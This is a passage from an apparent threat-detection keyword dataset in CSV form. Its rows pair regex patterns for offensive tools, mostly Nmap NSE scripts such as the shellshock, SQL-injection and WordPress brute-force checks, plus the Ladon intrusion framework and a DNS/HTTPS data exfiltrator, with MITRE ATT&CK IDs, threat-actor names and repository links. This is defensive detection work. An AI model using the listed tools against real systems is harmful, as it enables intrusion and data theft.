(Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* http-sap-netweaver-leak.nse*",".{0,1000}\shttp\-sap\-netweaver\-leak\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-security-headers.nse*",".{0,1000}\shttp\-security\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-server-header.nse*",".{0,1000}\shttp\-server\-header\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-shellshock.nse*",".{0,1000}\shttp\-shellshock\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-sitemap-generator.nse*",".{0,1000}\shttp\-sitemap\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-slowloris.nse*",".{0,1000}\shttp\-slowloris\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-slowloris-check.nse*",".{0,1000}\shttp\-slowloris\-check\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* HTTPSniffer *",".{0,1000}\sHTTPSniffer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* http-spider-log4shell.nse*",".{0,1000}\shttp\-spider\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* http-sql-injection.nse*",".{0,1000}\shttp\-sql\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* https-redirect.nse*",".{0,1000}\shttps\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-stored-xss.nse*",".{0,1000}\shttp\-stored\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-svn-enum.nse*",".{0,1000}\shttp\-svn\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-svn-info.nse*",".{0,1000}\shttp\-svn\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-tenda-enum.nse*",".{0,1000}\shttp\-tenda\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* http-title.nse*",".{0,1000}\shttp\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-tplink-dir-traversal.nse*",".{0,1000}\shttp\-tplink\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-trace.nse*",".{0,1000}\shttp\-trace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-traceroute.nse*",".{0,1000}\shttp\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-trane-info.nse*",".{0,1000}\shttp\-trane\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-unsafe-output-escaping.nse*",".{0,1000}\shttp\-unsafe\-output\-escaping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-useragent-tester.nse*",".{0,1000}\shttp\-useragent\-tester\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-userdir-enum.nse*",".{0,1000}\shttp\-userdir\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vhosts.nse*",".{0,1000}\shttp\-vhosts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-virustotal.nse*",".{0,1000}\shttp\-virustotal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vlcstreamer-ls.nse*",".{0,1000}\shttp\-vlcstreamer\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vmware-path-vuln.nse*",".{0,1000}\shttp\-vmware\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2006-3392.nse*",".{0,1000}\shttp\-vuln\-cve2006\-3392\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2009-3960.nse*",".{0,1000}\shttp\-vuln\-cve2009\-3960\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2010-0738.nse*",".{0,1000}\shttp\-vuln\-cve2010\-0738\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2010-2861.nse*",".{0,1000}\shttp\-vuln\-cve2010\-2861\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2011-3192.nse*",".{0,1000}\shttp\-vuln\-cve2011\-3192\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2011-3368.nse*",".{0,1000}\shttp\-vuln\-cve2011\-3368\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2012-1823.nse*",".{0,1000}\shttp\-vuln\-cve2012\-1823\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2013-0156.nse*",".{0,1000}\shttp\-vuln\-cve2013\-0156\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2013-6786.nse*",".{0,1000}\shttp\-vuln\-cve2013\-6786\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2013-7091.nse*",".{0,1000}\shttp\-vuln\-cve2013\-7091\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2014-2126.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2126\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2014-2127.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2127\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2014-2128.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2128\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2014-2129.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2129\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2014-3704.nse*",".{0,1000}\shttp\-vuln\-cve2014\-3704\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2014-8877.nse*",".{0,1000}\shttp\-vuln\-cve2014\-8877\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2015-1427.nse*",".{0,1000}\shttp\-vuln\-cve2015\-1427\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2015-1635.nse*",".{0,1000}\shttp\-vuln\-cve2015\-1635\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2017-1001000.nse*",".{0,1000}\shttp\-vuln\-cve2017\-1001000\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2017-5638.nse*",".{0,1000}\shttp\-vuln\-cve2017\-5638\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2017-5689.nse*",".{0,1000}\shttp\-vuln\-cve2017\-5689\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2017-8917.nse*",".{0,1000}\shttp\-vuln\-cve2017\-8917\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vulners-regex.nse*",".{0,1000}\shttp\-vulners\-regex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","0","N/A","N/A","10","3124","534","2024-04-03T11:53:29Z","2017-12-19T21:21:28Z" "* http-vuln-misfortune-cookie.nse*",".{0,1000}\shttp\-vuln\-misfortune\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-wnr1000-creds.nse*",".{0,1000}\shttp\-vuln\-wnr1000\-creds\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-waf-detect.nse*",".{0,1000}\shttp\-waf\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-waf-fingerprint.nse*",".{0,1000}\shttp\-waf\-fingerprint\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-webdav-scan.nse*",".{0,1000}\shttp\-webdav\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-wordpress-brute.nse*",".{0,1000}\shttp\-wordpress\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-wordpress-enum.nse*",".{0,1000}\shttp\-wordpress\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 